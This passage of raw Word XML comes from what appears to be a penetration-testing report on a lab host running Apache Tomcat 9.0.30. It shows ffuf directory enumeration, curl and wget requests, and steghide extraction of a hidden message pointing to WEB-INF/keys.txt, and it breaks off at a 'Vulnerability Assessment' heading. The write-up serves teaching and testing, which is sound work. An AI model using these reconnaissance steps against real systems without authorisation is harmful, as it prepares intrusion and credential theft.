          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> service for Apache Tomcat 9.0.30</w:t>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="89" w:name="paragraph37"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource37"</w:instrText>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.20</w:t>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B12F0E" w14:textId="60B8D143" w:rsidR="00CF0400" w:rsidRPr="00D77DFE" w:rsidRDefault="00647F5C" w:rsidP="00123285">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Since the target provides an HTTP service, the tester investigates the exposed web application. Directory enumeration is conducted using</w:t>
      </w:r>
      <w:r w:rsidR="00140952" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00140952" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ffuf tool</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00140952" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF0400" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ffuf -w &lt;wordlist&gt; -u &lt;url&gt;/FUZZ</w:t>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="90" w:name="paragraph38"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource38"</w:instrText>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.21</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00963CE2" w14:textId="00A05991" w:rsidR="00DD5501" w:rsidRPr="00D77DFE" w:rsidRDefault="00DD5501" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc223521123"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.2 Enumeration HTTP on 10.0.2.178</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="1EF92399" w14:textId="77777777" w:rsidR="009025BF" w:rsidRDefault="00647F5C" w:rsidP="00A5079F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This identifies several endpoints, including /examples, /manager, /tomcat, and /stocznia. The tester focuses on /stocznia and retrieves its contents with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D73ECC2" w14:textId="6B4A5DB0" w:rsidR="006127F5" w:rsidRPr="00D77DFE" w:rsidRDefault="00CF0400" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="009025BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://10.0.2.178:8080/stocznia/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="92" w:name="paragraph39"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource39"</w:instrText>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.22</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A05848" w14:textId="1858B950" w:rsidR="00647F5C" w:rsidRPr="00D77DFE" w:rsidRDefault="00647F5C" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Two subdirectories are discovered: /stocznia/images/ and /stocznia/_backup/. Within the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>images</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, a file named photo.jpg is obtained via</w:t>
      </w:r>
      <w:r w:rsidR="00B251B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to scan the content of the metadata inside the file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0118CAD5" w14:textId="534EDC8D" w:rsidR="002F6C2C" w:rsidRPr="00D77DFE" w:rsidRDefault="002F6C2C" w:rsidP="00686E5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>http://10.0.2.178:8080/stocznia/images/photo.jpg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="93" w:name="paragraph40"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource40"</w:instrText>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.23</w:t>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:bookmarkStart w:id="94" w:name="paragraph41"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource41"</w:instrText>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.24</w:t>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:r w:rsidR="00A5079F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2407EDA1" w14:textId="51857E71" w:rsidR="00194178" w:rsidRPr="00D77DFE" w:rsidRDefault="00647F5C" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Standard file analysis tools reveal nothing, but steghide extracts hidden content, producing secret.txt</w:t>
      </w:r>
      <w:r w:rsidR="006F5BA4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="95" w:name="paragraph42"/>
      <w:r w:rsidR="006F5BA4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006F5BA4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource42"</w:instrText>
      </w:r>
      <w:r w:rsidR="006F5BA4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="006F5BA4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006F5BA4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.25</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:r w:rsidR="006F5BA4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. The recovered message points to an internal path: WEB-INF/keys.txt, which the tester records for later exploitation</w:t>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="96" w:name="paragraph43"/>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource43"</w:instrText>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.26</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0037349A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BEBE59" w14:textId="573BFB18" w:rsidR="00DD5501" w:rsidRPr="00D77DFE" w:rsidRDefault="00DD5501" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc223521124"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.3 Vulnerability Assessment against 10.0.2.178</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="0FA595C5" w14:textId="5D352B88" w:rsidR="00647F5C" w:rsidRPr="00D77DFE" w:rsidRDefault="00647F5C" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
